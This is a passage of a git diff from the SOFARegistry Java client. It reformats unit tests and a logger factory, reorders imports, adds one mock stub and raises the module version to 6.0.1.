java.util.HashMap; import java.util.List; +import org.junit.Assert; +import org.junit.BeforeClass; +import org.junit.Test; -import static org.mockito.Mockito.doThrow; -import static org.mockito.Mockito.mock; -import static org.mockito.Mockito.when; - -/** - * @author GengZhang - */ +/** @author GengZhang */ public class ReceivedDataProcessorTest { - private static ReceivedDataProcessor processor; + private static ReceivedDataProcessor processor; - @BeforeClass - public static void init() { - RegisterCache registerCache = mock(RegisterCache.class); - ObserverHandler handler = mock(ObserverHandler.class); - Subscriber configurator2 = mock(Subscriber.class); - when(registerCache.getSubscriberByRegistId("11")).thenReturn(null); - when(registerCache.getSubscriberByRegistId("22")).thenReturn(configurator2); - DefaultSubscriber configurator3 = mock(DefaultSubscriber.class); - when(registerCache.getSubscriberByRegistId("33")).thenReturn(configurator3); - doThrow(new RuntimeException()).when(handler).notify(configurator3); + @BeforeClass + public static void init() { + RegisterCache registerCache = mock(RegisterCache.class); + ObserverHandler handler = mock(ObserverHandler.class); + Subscriber configurator2 = mock(Subscriber.class); + when(registerCache.getSubscriberByRegistId("11")).thenReturn(null); + when(registerCache.getSubscriberByRegistId("22")).thenReturn(configurator2); + DefaultSubscriber configurator3 = mock(DefaultSubscriber.class); + when(registerCache.getSubscriberByRegistId("33")).thenReturn(configurator3); + doThrow(new RuntimeException()).when(handler).notify(configurator3); - processor = new ReceivedDataProcessor(registerCache, handler); - } + processor = new ReceivedDataProcessor(registerCache, handler); + } - @Test - public void handleRequest() { - Result result = (Result) processor.handleRequest(null, null); - Assert.assertTrue(result.isSuccess()); - Assert.assertNull(result.getMessage()); + @Test + public void handleRequest() { + Result result = (Result) processor.handleRequest(null, null); + Assert.assertTrue(result.isSuccess()); + Assert.assertNull(result.getMessage()); - ReceivedData request = new ReceivedData(); - result = (Result) processor.handleRequest(null, request); - Assert.assertTrue(result.isSuccess()); - Assert.assertNull(result.getMessage()); + ReceivedData request = new ReceivedData(); + result = (Result) processor.handleRequest(null, request); + Assert.assertTrue(result.isSuccess()); + Assert.assertNull(result.getMessage()); - request = new ReceivedData(); - request.setSubscriberRegistIds(null); - request.setData(new HashMap>()); - request.setVersion(1234L); - request.setSegment("seg1"); - request.setLocalZone("local"); + request = new ReceivedData(); + request.setSubscriberRegistIds(null); + request.setData(new HashMap>()); + request.setVersion(1234L); + request.setSegment("seg1"); + request.setLocalZone("local"); - result = (Result) processor.handleRequest(null, request); - Assert.assertFalse(result.isSuccess()); - Assert.assertEquals("", result.getMessage()); + result = (Result) processor.handleRequest(null, request); + Assert.assertFalse(result.isSuccess()); + Assert.assertEquals("", result.getMessage()); - request.setSubscriberRegistIds(Arrays.asList("11", "22", "33")); - result = (Result) processor.handleRequest(null, request); - Assert.assertTrue(result.isSuccess()); - Assert.assertNull(result.getMessage()); - } + request.setSubscriberRegistIds(Arrays.asList("11", "22", "33")); + result = (Result) processor.handleRequest(null, request); + Assert.assertTrue(result.isSuccess()); + Assert.assertNull(result.getMessage()); + } - @Test - public void interest() { - Assert.assertEquals(ReceivedData.class.getName(), processor.interest()); - } -} \ No newline at end of file + @Test + public void interest() { + Assert.assertEquals(ReceivedData.class.getName(), processor.interest()); + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/task/SyncConfigThreadTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/task/SyncConfigThreadTest.java index 5d75ae3e4..be8def592 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/task/SyncConfigThreadTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/task/SyncConfigThreadTest.java @@ -16,6 +16,15 @@ */ package com.alipay.sofa.registry.client.task; +import static org.mockito.Matchers.any; +import static org.mockito.Matchers.anyListOf; +import static org.mockito.Matchers.anyObject; +import static org.mockito.Matchers.eq; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.times; +import static org.mockito.Mockito.verify; +import static org.mockito.Mockito.when; + import com.alipay.remoting.exception.RemotingException; import com.alipay.sofa.registry.client.api.RegistryClientConfig; import com.alipay.sofa.registry.client.api.Subscriber; @@ -24,69 +33,62 @@ import com.alipay.sofa.registry.client.provider.RegisterCache; import com.alipay.sofa.registry.client.remoting.Client; import com.alipay.sofa.registry.core.model.SyncConfigResponse; -import org.junit.Test; - import java.util.ArrayList; import java.util.Arrays; import java.util.List; - -import static org.mockito.Matchers.any; -import static org.mockito.Matchers.anyListOf; -import static org.mockito.Matchers.anyObject; -import static org.mockito.Matchers.eq; -import static org.mockito.Mockito.mock; -import static org.mockito.Mockito.times; -import static org.mockito.Mockito.verify; -import static org.mockito.Mockito.when; +import org.junit.Test; /** - * * @author zhuoyu.sjw * @version $Id: SyncConfigThreadTest.java, v 0.1 2018-03-15 14:33 zhuoyu.sjw Exp $$ */ public class SyncConfigThreadTest { - @Test - public void syncConfigTest() throws RemotingException, InterruptedException { + @Test + public void syncConfigTest() throws RemotingException, InterruptedException { - // mock - RegistryClientConfig config = DefaultRegistryClientConfigBuilder.start() - .setDataCenter("test-data-center").setZone("test-zone") - .setSyncConfigRetryInterval(1000).build(); + // mock + RegistryClientConfig config = + DefaultRegistryClientConfigBuilder.start() + .setDataCenter("test-data-center") + .setZone("test-zone") + .setSyncConfigRetryInterval(1000) + .build(); - Client client = mock(Client.class); - RegisterCache registerCache = mock(RegisterCache.class); - ObserverHandler observerHandler = mock(ObserverHandler.class); - DefaultSubscriber subscriber = mock(DefaultSubscriber.class); + Client client = mock(Client.class); + RegisterCache registerCache = mock(RegisterCache.class); + ObserverHandler observerHandler = mock(ObserverHandler.class); + DefaultSubscriber subscriber = mock(DefaultSubscriber.class); - // when - when(client.isConnected()).thenReturn(true); + // when + when(client.isConnected()).thenReturn(true); - SyncConfigResponse response = new SyncConfigResponse(); - response.setSuccess(true); - response.setAvailableSegments(Arrays.asList("segment1", "segment2")); - response.setRetryInterval(3000000); - when(client.invokeSync(anyObject())).thenReturn(response); + SyncConfigResponse response = new SyncConfigResponse(); + response.setSuccess(true); + response.setAvailableSegments(Arrays.asList("segment1", "segment2")); + response.setRetryInterval(3000000); + when(client.invokeSync(anyObject())).thenReturn(response); - List subscribers = new ArrayList(); - subscribers.add(subscriber); - when(registerCache.getAllSubscribers()).thenReturn(subscribers); + List subscribers = new ArrayList(); + subscribers.add(subscriber); + when(registerCache.getAllSubscribers()).thenReturn(subscribers); - when(subscriber.getAvailableSegments()).thenReturn(new ArrayList()); + when(subscriber.getAvailableSegments()).thenReturn(new ArrayList()); + when(subscriber.isInited()).thenReturn(true); - // do - SyncConfigThread configThread = new SyncConfigThread(client, registerCache, config, - observerHandler); - configThread.start(); + // do + SyncConfigThread configThread = + new SyncConfigThread(client, registerCache, config, observerHandler); + configThread.start(); - Thread.sleep(2000L); + Thread.sleep(2000L); - // verify - verify(client, times(1)).isConnected(); - verify(client, times(1)).invokeSync(any()); + // verify + verify(client, times(1)).isConnected(); + verify(client, times(1)).invokeSync(any()); - verify(subscriber, times(1)).setAvailableSegments(anyListOf(String.class)); + verify(subscriber, times(1)).setAvailableSegments(anyListOf(String.class)); - verify(observerHandler, times(1)).notify(eq(subscriber)); - } -} \ No newline at end of file + verify(observerHandler, times(1)).notify(eq(subscriber)); + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/task/TaskEventTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/task/TaskEventTest.java index 3d98d42cf..72a0fcd50 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/task/TaskEventTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/task/TaskEventTest.java @@ -16,92 +16,91 @@ */ package com.alipay.sofa.registry.client.task; +import static org.mockito.Mockito.when; + import com.alipay.sofa.registry.client.api.Register; import org.junit.Assert; import org.junit.Test; import org.mockito.Mockito; -import static org.mockito.Mockito.when; - -/** - * @author GengZhang - */ +/** @author GengZhang */ public class TaskEventTest { - @Test - public void delayTime() { - TaskEvent event1 = new TaskEvent(null); - Assert.assertTrue(event1.delayTime() <= 200); - event1.incSendCount(); - Assert.assertTrue(event1.delayTime() <= 400); - event1.incSendCount(); - Assert.assertTrue(event1.delayTime() <= 600); - event1.incSendCount(); - Assert.assertTrue(event1.delayTime() <= 800); - event1.incSendCount(); - Assert.assertTrue(event1.delayTime() <= 1000); - event1.incSendCount(); - Assert.assertTrue(event1.delayTime() <= 1000); - } + @Test + public void delayTime() { + TaskEvent event1 = new TaskEvent(null); + Assert.assertTrue(event1.delayTime() <= 200); + event1.incSendCount(); + Assert.assertTrue(event1.delayTime() <= 400); + event1.incSendCount(); + Assert.assertTrue(event1.delayTime() <= 600); + event1.incSendCount(); + Assert.assertTrue(event1.delayTime() <= 800); + event1.incSendCount(); + Assert.assertTrue(event1.delayTime() <= 1000); + event1.incSendCount(); + Assert.assertTrue(event1.delayTime() <= 1000); + } + + @Test + public void testCompare() { + TaskEvent event1 = new TaskEvent(null); + TaskEvent event2 = new TaskEvent(null); + Assert.assertEquals(0, event1.compareTo(event2)); - @Test - public void testCompare() { - TaskEvent event1 = new TaskEvent(null); - TaskEvent event2 = new TaskEvent(null); - Assert.assertEquals(0, event1.compareTo(event2)); + event1.incSendCount(); + Assert.assertEquals(1, event1.compareTo(event2)); + Assert.assertEquals(-1, event2.compareTo(event1)); + event2.incSendCount(); - event1.incSendCount(); - Assert.assertEquals(1, event1.compareTo(event2)); - Assert.assertEquals(-1, event2.compareTo(event1)); - event2.incSendCount(); + Register register = Mockito.mock(Register.class); + TaskEvent event3 = new TaskEvent(register); + TaskEvent event4 = new TaskEvent(register); + TaskEvent event5 = new TaskEvent(null); + Assert.assertEquals(1, event4.compareTo(event5)); + Assert.assertEquals(-1, event5.compareTo(event3)); - Register register = Mockito.mock(Register.class); - TaskEvent event3 = new TaskEvent(register); - TaskEvent event4 = new TaskEvent(register); - TaskEvent event5 = new TaskEvent(null); - Assert.assertEquals(1, event4.compareTo(event5)); - Assert.assertEquals(-1, event5.compareTo(event3)); + Register register6 = Mockito.mock(Register.class); + when(register6.getTimestamp()).thenReturn(123L); + Register register7 = Mockito.mock(Register.class); + when(register7.getTimestamp()).thenReturn(234L); + TaskEvent event6 = new TaskEvent(register6); + TaskEvent event7 = new TaskEvent(register7); + TaskEvent event8 = new TaskEvent(register7); + Assert.assertEquals(1, event7.compareTo(event6)); + Assert.assertEquals(-1, event6.compareTo(event7)); + Assert.assertEquals(0, event8.compareTo(event7)); + } - Register register6 = Mockito.mock(Register.class); - when(register6.getTimestamp()).thenReturn(123L); - Register register7 = Mockito.mock(Register.class); - when(register7.getTimestamp()).thenReturn(234L); - TaskEvent event6 = new TaskEvent(register6); - TaskEvent event7 = new TaskEvent(register7); - TaskEvent event8 = new TaskEvent(register7); - Assert.assertEquals(1, event7.compareTo(event6)); - Assert.assertEquals(-1, event6.compareTo(event7)); - Assert.assertEquals(0, event8.compareTo(event7)); - } + @Test + public void testEquals() { + TaskEvent event1 = new TaskEvent(null); + TaskEvent event2 = new TaskEvent(null); - @Test - public void testEquals() { - TaskEvent event1 = new TaskEvent(null); - Assert.assertTrue(event1.equals(event1)); - Assert.assertFalse(event1.equals("xxxx")); - TaskEvent event2 = new TaskEvent(null); - Assert.assertTrue(event1.equals(event2)); + Assert.assertTrue(event1.equals(event1)); + Assert.assertFalse(event1.equals("xxxx")); + Assert.assertTrue(event1.equals(event2)); - event1.incSendCount(); - Assert.assertFalse(event1.equals(event2)); - event2.incSendCount(); + event1.incSendCount(); + Assert.assertFalse(event1.equals(event2)); + event2.incSendCount(); - event1.setTriggerTime(123); - Assert.assertFalse(event1.equals(event2)); - event2.setTriggerTime(123); + event1.setTriggerTime(123); + Assert.assertFalse(event1.equals(event2)); + event2.setTriggerTime(123); - Register register = Mockito.mock(Register.class); - TaskEvent event3 = new TaskEvent(register); - TaskEvent event4 = new TaskEvent(register); - Assert.assertTrue(event3.equals(event4)); - } + Register register = Mockito.mock(Register.class); + TaskEvent event3 = new TaskEvent(register); + TaskEvent event4 = new TaskEvent(register); + Assert.assertTrue(event3.equals(event4)); + } - @Test - public void testHashCode() { - TaskEvent event1 = new TaskEvent(null); - TaskEvent event2 = new TaskEvent(null); - Assert.assertEquals(event1.hashCode(), event2.hashCode()); - event1.setTriggerTime(1234); - Assert.assertNotEquals(event1.hashCode(), event2.hashCode()); - } -} \ No newline at end of file + @Test + public void testHashCode() { + TaskEvent event1 = new TaskEvent(null); + TaskEvent event2 = new TaskEvent(null); + Assert.assertEquals(event1.hashCode(), event2.hashCode()); + event1.setTriggerTime(1234); + Assert.assertNotEquals(event1.hashCode(), event2.hashCode()); + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/util/CommonUtilsTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/util/CommonUtilsTest.java index e66d4e8e2..1ac940e9e 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/util/CommonUtilsTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/util/CommonUtilsTest.java @@ -16,20 +16,17 @@ */ package com.alipay.sofa.registry.client.util; +import java.util.Collections; import org.junit.Assert; import org.junit.Test; -import java.util.Collections; - -/** - * @author GengZhang - */ +/** @author GengZhang */ public class CommonUtilsTest { - @Test - public void isNotEmpty() { - Assert.assertTrue(CommonUtils.isNotEmpty(Collections.singletonList("xxx"))); - Assert.assertFalse(CommonUtils.isNotEmpty(null)); - Assert.assertFalse(CommonUtils.isNotEmpty(Collections.emptyList())); - } -} \ No newline at end of file + @Test + public void isNotEmpty() { + Assert.assertTrue(CommonUtils.isNotEmpty(Collections.singletonList("xxx"))); + Assert.assertFalse(CommonUtils.isNotEmpty(null)); + Assert.assertFalse(CommonUtils.isNotEmpty(Collections.emptyList())); + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/util/HttpClientUtilsTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/util/HttpClientUtilsTest.java index b45da2ed7..bfa19631a 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/util/HttpClientUtilsTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/util/HttpClientUtilsTest.java @@ -21,86 +21,83 @@ import com.sun.net.httpserver.HttpExchange; import com.sun.net.httpserver.HttpHandler; import com.sun.net.httpserver.HttpServer; -import org.junit.AfterClass; -import org.junit.Assert; -import org.junit.BeforeClass; -import org.junit.Test; - import java.io.IOException; import java.io.OutputStream; import java.net.InetSocketAddress; import java.util.HashMap; import java.util.Map; +import org.junit.AfterClass; +import org.junit.Assert; +import org.junit.BeforeClass; +import org.junit.Test; -/** - * @author GengZhang - */ +/** @author GengZhang */ public class HttpClientUtilsTest { - private static HttpServer httpServer; + private static HttpServer httpServer; - @BeforeClass - public static void start() throws IOException { - httpServer = com.sun.net.httpserver.HttpServer.create(new InetSocketAddress(5678), 0); - httpServer.createContext("/xxx", new MockHandler()); - httpServer.createContext("/yyy", new ErrorHandler()); - httpServer.setExecutor(null); - httpServer.start(); - } + @BeforeClass + public static void start() throws IOException { + httpServer = com.sun.net.httpserver.HttpServer.create(new InetSocketAddress(5678), 0); + httpServer.createContext("/xxx", new MockHandler()); + httpServer.createContext("/yyy", new ErrorHandler()); + httpServer.setExecutor(null); + httpServer.start(); + } - @AfterClass - public static void stop() { - httpServer.stop(1); - } + @AfterClass + public static void stop() { + httpServer.stop(1); + } - @Test - public void testGet() { - String url = "http://127.0.0.1:56789/xxx"; - Map map = new HashMap(); - map.put("x", "1"); - map.put("y", "2"); - RegistryClientConfig clientConfig = new DefaultRegistryClientConfigBuilder().build(); - try { - // wrong url - HttpClientUtils.get(url, map, clientConfig); - Assert.fail(); - } catch (Exception e) { - } + @Test + public void testGet() { + String url = "http://127.0.0.1:56789/xxx"; + Map map = new HashMap(); + map.put("x", "1"); + map.put("y", "2"); + RegistryClientConfig clientConfig = new DefaultRegistryClientConfigBuilder().build(); + try { + // wrong url + HttpClientUtils.get(url, map, clientConfig); + Assert.fail(); + } catch (Exception e) { + } - url = "http://127.0.0.1:5678/xxx"; - try { - HttpClientUtils.get(url, map, clientConfig); - } catch (Exception e) { - Assert.fail(e.getMessage()); - } + url = "http://127.0.0.1:5678/xxx"; + try { + HttpClientUtils.get(url, map, clientConfig); + } catch (Exception e) { + Assert.fail(e.getMessage()); + } - url = "http://127.0.0.1:5678/yyy"; - try { - Assert.assertNull(HttpClientUtils.get(url, map, clientConfig)); - } catch (Exception e) { - Assert.fail(e.getMessage()); - } + url = "http://127.0.0.1:5678/yyy"; + try { + Assert.assertNull(HttpClientUtils.get(url, map, clientConfig)); + } catch (Exception e) { + Assert.fail(e.getMessage()); } + } - static class MockHandler implements HttpHandler { - @Override - public void handle(HttpExchange exchange) throws IOException { - String response = "hello world"; - exchange.sendResponseHeaders(200, response.getBytes().length); - OutputStream os = exchange.getResponseBody(); - os.write(response.getBytes()); - os.close(); - } + static class MockHandler implements HttpHandler { + @Override + public void handle(HttpExchange exchange) throws IOException { + String response = "hello world"; + exchange.sendResponseHeaders(200, response.getBytes().length); + OutputStream os = exchange.getResponseBody(); + os.write(response.getBytes()); + os.close(); } + } - static class ErrorHandler implements HttpHandler { - @Override - public void handle(HttpExchange exchange) throws IOException { - String response = "ServerDown"; - exchange.sendResponseHeaders(500, response.getBytes().length); - OutputStream os = exchange.getResponseBody(); - os.write(response.getBytes()); - os.close(); - } + static class ErrorHandler implements HttpHandler { + @Override + public void handle(HttpExchange exchange) throws IOException { + String response = "ServerDown"; + exchange.sendResponseHeaders(500, response.getBytes().length); + OutputStream os = exchange.getResponseBody(); + os.write(response.getBytes()); + os.close(); } -} \ No newline at end of file + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/util/ServerNodeParserTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/util/ServerNodeParserTest.java index 5fdb579f1..09976849c 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/util/ServerNodeParserTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/util/ServerNodeParserTest.java @@ -20,87 +20,84 @@ import org.junit.Assert; import org.junit.Test; -/** - * @author GengZhang - */ +/** @author GengZhang */ public class ServerNodeParserTest { - @Test - public void parse() { - boolean error = false; - try { - ServerNodeParser.parse(null); - } catch (Exception e) { - Assert.assertTrue(e instanceof IllegalArgumentException); - error = true; - } - Assert.assertTrue(error); - - error = false; - try { - ServerNodeParser.parse("127.0.0.1:"); - } catch (Exception e) { - Assert.assertTrue(e instanceof IllegalArgumentException); - error = true; - } - Assert.assertTrue(error); + @Test + public void parse() { + boolean error = false; + try { + ServerNodeParser.parse(null); + } catch (Exception e) { + Assert.assertTrue(e instanceof IllegalArgumentException); + error = true; + } + Assert.assertTrue(error); - error = false; - try { - ServerNodeParser.parse("127.0.0.1"); - } catch (Exception e) { - Assert.assertTrue(e instanceof IllegalArgumentException); - error = true; - } - Assert.assertTrue(error); + error = false; + try { + ServerNodeParser.parse("127.0.0.1:"); + } catch (Exception e) { + Assert.assertTrue(e instanceof IllegalArgumentException); + error = true; + } + Assert.assertTrue(error); - error = false; - try { - ServerNodeParser.parse("127.0.0.1:12345?"); - } catch (Exception e) { - Assert.assertTrue(e instanceof IllegalArgumentException); - error = true; - } - Assert.assertTrue(error); + error = false; + try { + ServerNodeParser.parse("127.0.0.1"); + } catch (Exception e) { + Assert.assertTrue(e instanceof IllegalArgumentException); + error = true; + } + Assert.assertTrue(error); - error = false; - try { - ServerNodeParser.parse("127.0.0.1:12345?x"); - } catch (Exception e) { - Assert.assertTrue(e instanceof IllegalArgumentException); - error = true; - } - Assert.assertTrue(error); + error = false; + try { + ServerNodeParser.parse("127.0.0.1:12345?"); + } catch (Exception e) { + Assert.assertTrue(e instanceof IllegalArgumentException); + error = true; + } + Assert.assertTrue(error); - error = false; - try { - ServerNodeParser.parse("127.0.0.1:12345?x="); - } catch (Exception e) { - Assert.assertTrue(e instanceof IllegalArgumentException); - error = true; - } - Assert.assertTrue(error); + error = false; + try { + ServerNodeParser.parse("127.0.0.1:12345?x"); + } catch (Exception e) { + Assert.assertTrue(e instanceof IllegalArgumentException); + error = true; + } + Assert.assertTrue(error); - error = false; - try { - ServerNodeParser.parse("127.0.0.1:12345?x=1&"); - } catch (Exception e) { - Assert.assertTrue(e instanceof IllegalArgumentException); - error = true; - } - Assert.assertTrue(error); + error = false; + try { + ServerNodeParser.parse("127.0.0.1:12345?x="); + } catch (Exception e) { + Assert.assertTrue(e instanceof IllegalArgumentException); + error = true; + } + Assert.assertTrue(error); - error = false; - String url = "127.0.0.2:12345"; - ServerNode node = ServerNodeParser.parse(url); + error = false; + try { + ServerNodeParser.parse("127.0.0.1:12345?x=1&"); + } catch (Exception e) { + Assert.assertTrue(e instanceof IllegalArgumentException); + error = true; + } + Assert.assertTrue(error); - Assert.assertEquals("127.0.0.2", node.getHost()); - Assert.assertEquals(12345, node.getPort()); + error = false; + String url = "127.0.0.2:12345"; + ServerNode node = ServerNodeParser.parse(url); - url = "127.0.0.3:23456?x=1&y=2&z=3"; - node = ServerNodeParser.parse(url); - Assert.assertEquals("127.0.0.3", node.getHost()); - Assert.assertEquals(23456, node.getPort()); + Assert.assertEquals("127.0.0.2", node.getHost()); + Assert.assertEquals(12345, node.getPort()); - } -} \ No newline at end of file + url = "127.0.0.3:23456?x=1&y=2&z=3"; + node = ServerNodeParser.parse(url); + Assert.assertEquals("127.0.0.3", node.getHost()); + Assert.assertEquals(23456, node.getPort()); + } +} diff --git a/client/impl/src/test/java/com/alipay/sofa/registry/client/util/StringUtilsTest.java b/client/impl/src/test/java/com/alipay/sofa/registry/client/util/StringUtilsTest.java index f60ca729b..f77dc8413 100644 --- a/client/impl/src/test/java/com/alipay/sofa/registry/client/util/StringUtilsTest.java +++ b/client/impl/src/test/java/com/alipay/sofa/registry/client/util/StringUtilsTest.java @@ -19,71 +19,67 @@ import org.junit.Assert; import org.junit.Test; -/** - * @author GengZhang - */ +/** @author GengZhang */ public class StringUtilsTest { - @Test - public void isEmpty() { - Assert.assertTrue(StringUtils.isEmpty(null)); - Assert.assertTrue(StringUtils.isEmpty("")); - Assert.assertFalse(StringUtils.isEmpty(" ")); - } + @Test + public void isEmpty() { + Assert.assertTrue(StringUtils.isEmpty(null)); + Assert.assertTrue(StringUtils.isEmpty("")); + Assert.assertFalse(StringUtils.isEmpty(" ")); + } - @Test - public void isNotEmpty() { - Assert.assertFalse(StringUtils.isNotEmpty(null)); - Assert.assertFalse(StringUtils.isNotEmpty("")); - Assert.assertTrue(StringUtils.isNotEmpty(" ")); - } + @Test + public void isNotEmpty() { + Assert.assertFalse(StringUtils.isNotEmpty(null)); + Assert.assertFalse(StringUtils.isNotEmpty("")); + Assert.assertTrue(StringUtils.isNotEmpty(" ")); + } - @Test - public void isBlank() { - Assert.assertTrue(StringUtils.isBlank(null)); - Assert.assertTrue(StringUtils.isBlank("")); - Assert.assertTrue(StringUtils.isBlank(" ")); - Assert.assertFalse(StringUtils.isBlank(" 1")); - } + @Test + public void isBlank() { + Assert.assertTrue(StringUtils.isBlank(null)); + Assert.assertTrue(StringUtils.isBlank("")); + Assert.assertTrue(StringUtils.isBlank(" ")); + Assert.assertFalse(StringUtils.isBlank(" 1")); + } - @Test - public void isNotBlank() { - Assert.assertFalse(StringUtils.isNotBlank(null)); - Assert.assertFalse(StringUtils.isNotBlank("")); - Assert.assertFalse(StringUtils.isNotBlank(" ")); - Assert.assertTrue(StringUtils.isNotBlank(" 1")); - } + @Test + public void isNotBlank() { + Assert.assertFalse(StringUtils.isNotBlank(null)); + Assert.assertFalse(StringUtils.isNotBlank("")); + Assert.assertFalse(StringUtils.isNotBlank(" ")); + Assert.assertTrue(StringUtils.isNotBlank(" 1")); + } - @Test - public void defaultString() { - Assert.assertEquals("", StringUtils.defaultString(null)); - Assert.assertEquals("x", StringUtils.defaultString("x")); - } - - @Test - public void testToString() { - Assert.assertEquals(null, StringUtils.toString(null)); - Assert.assertEquals("Bean:11", StringUtils.toString(new Bean("11"))); + @Test + public void defaultString() { + Assert.assertEquals("", StringUtils.defaultString(null)); + Assert.assertEquals("x", StringUtils.defaultString("x")); + } - Assert.assertEquals(null, StringUtils.toString((Object) null, null)); - Assert.assertEquals("1", StringUtils.toString((Object) null, "1")); - Assert.assertEquals("Bean:11", StringUtils.toString(new Bean("11"), null)); - } + @Test + public void testToString() { + Assert.assertEquals(null, StringUtils.toString(null)); + Assert.assertEquals("Bean:11", StringUtils.toString(new Bean("11"))); - class Bean { - private String s; + Assert.assertEquals(null, StringUtils.toString((Object) null, null)); + Assert.assertEquals("1", StringUtils.toString((Object) null, "1")); + Assert.assertEquals("Bean:11", StringUtils.toString(new Bean("11"), null)); + } - public Bean() { + class Bean { + private String s; - } + public Bean() {} - public Bean(String s) { - this.s = s; - } + public Bean(String s) { + this.s = s; + } - @Override - public String toString() { - return "Bean:" + s; - } + @Override + public String toString() { + return "Bean:" + s; } -} \ No newline at end of file + } +} diff --git a/client/log/pom.xml b/client/log/pom.xml index b41fb3f47..2da3735a5 100644 --- a/client/log/pom.xml +++ b/client/log/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-client-parent - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 diff --git a/client/log/src/main/java/com/alipay/sofa/registry/client/log/LoggerFactory.java b/client/log/src/main/java/com/alipay/sofa/registry/client/log/LoggerFactory.java index ba80b7480..d1bcd5fc5 100644 --- a/client/log/src/main/java/com/alipay/sofa/registry/client/log/LoggerFactory.java +++ b/client/log/src/main/java/com/alipay/sofa/registry/client/log/LoggerFactory.java @@ -17,85 +17,85 @@ package com.alipay.sofa.registry.client.log; import com.alipay.sofa.common.log.LoggerSpaceManager; -import org.slf4j.Logger; - import java.io.File; +import org.slf4j.Logger; /** * The type Logger factory. + * * @author zhuoyu.sjw * @version $Id : LoggerFactory.java, v 0.1 2018-03-24 12:06 zhuoyu.sjw Exp $$ */ public class LoggerFactory { - private static final String LOG_SPACE_PROPERTY = "registry.client.log.space"; - private static final String LOG_PATH = "logging.path"; - private static final String LOG_PATH_DEFAULT = System.getProperty("user.home") - + File.separator + "logs"; - private static final String CLIENT_LOG_LEVEL = "com.alipay.sofa.registry.client.log.level"; - private static final String CLIENT_LOG_LEVEL_DEFAULT = "INFO"; - private static final String CLIENT_LOG_ENCODE = "com.alipay.sofa.registry.client.log.encode"; - private static final String CLIENT_LOG_ENCODE_DEFAULT = "UTF-8"; - private static String logSpace = "com.alipay.sofa.registry.client"; + private static final String LOG_SPACE_PROPERTY = "registry.client.log.space"; + private static final String LOG_PATH = "logging.path"; + private static final String LOG_PATH_DEFAULT = + System.getProperty("user.home") + File.separator + "logs"; + private static final String CLIENT_LOG_LEVEL = "com.alipay.sofa.registry.client.log.level"; + private static final String CLIENT_LOG_LEVEL_DEFAULT = "INFO"; + private static final String CLIENT_LOG_ENCODE = "com.alipay.sofa.registry.client.log.encode"; + private static final String CLIENT_LOG_ENCODE_DEFAULT = "UTF-8"; + private static String logSpace = "com.alipay.sofa.registry.client"; - static { - LoggerFactory.logSpace = getLogSpace(); + static { + LoggerFactory.logSpace = getLogSpace(); - String logPath = System.getProperty(LOG_PATH); - String logLevel = System.getProperty(CLIENT_LOG_LEVEL); - String logEncode = System.getProperty(CLIENT_LOG_ENCODE); - if (isBlank(logPath)) { - System.setProperty(LOG_PATH, LOG_PATH_DEFAULT); - } - if (isBlank(logLevel)) { - System.setProperty(CLIENT_LOG_LEVEL, CLIENT_LOG_LEVEL_DEFAULT); - } - if (isBlank(logEncode)) { - System.setProperty(CLIENT_LOG_ENCODE, CLIENT_LOG_ENCODE_DEFAULT); - } + String logPath = System.getProperty(LOG_PATH); + String logLevel = System.getProperty(CLIENT_LOG_LEVEL); + String logEncode = System.getProperty(CLIENT_LOG_ENCODE); + if (isBlank(logPath)) { + System.setProperty(LOG_PATH, LOG_PATH_DEFAULT); } - - static String getLogSpace() { - String sysLogSpace = System.getProperty(LOG_SPACE_PROPERTY); - return (null != sysLogSpace && !sysLogSpace.isEmpty()) ? sysLogSpace : logSpace; + if (isBlank(logLevel)) { + System.setProperty(CLIENT_LOG_LEVEL, CLIENT_LOG_LEVEL_DEFAULT); + } + if (isBlank(logEncode)) { + System.setProperty(CLIENT_LOG_ENCODE, CLIENT_LOG_ENCODE_DEFAULT); } + } - /** - * Gets logger. - * - * @param clazz the clazz - * @return the logger - */ - public static Logger getLogger(Class clazz) { - if (clazz == null) { - return null; - } - return getLogger(clazz.getCanonicalName()); + static String getLogSpace() { + String sysLogSpace = System.getProperty(LOG_SPACE_PROPERTY); + return (null != sysLogSpace && !sysLogSpace.isEmpty()) ? sysLogSpace : logSpace; + } + + /** + * Gets logger. + * + * @param clazz the clazz + * @return the logger + */ + public static Logger getLogger(Class clazz) { + if (clazz == null) { + return null; } + return getLogger(clazz.getCanonicalName()); + } - /** - * Gets logger. - * - * @param name the name - * @return the logger - */ - public static Logger getLogger(String name) { - if (name == null || name.isEmpty()) { - return null; - } - return LoggerSpaceManager.getLoggerBySpace(name, logSpace); + /** + * Gets logger. + * + * @param name the name + * @return the logger + */ + public static Logger getLogger(String name) { + if (name == null || name.isEmpty()) { + return null; } + return LoggerSpaceManager.getLoggerBySpace(name, logSpace); + } - static boolean isBlank(CharSequence cs) { - int strLen; - if (cs == null || (strLen = cs.length()) == 0) { - return true; - } - for (int i = 0; i < strLen; i++) { - if (!Character.isWhitespace(cs.charAt(i))) { - return false; - } - } - return true; + static boolean isBlank(CharSequence cs) { + int strLen; + if (cs == null || (strLen = cs.length()) == 0) { + return true; + } + for (int i = 0; i < strLen; i++) { + if (!Character.isWhitespace(cs.charAt(i))) { + return false; + } } -} \ No newline at end of file + return true; + } +} diff --git 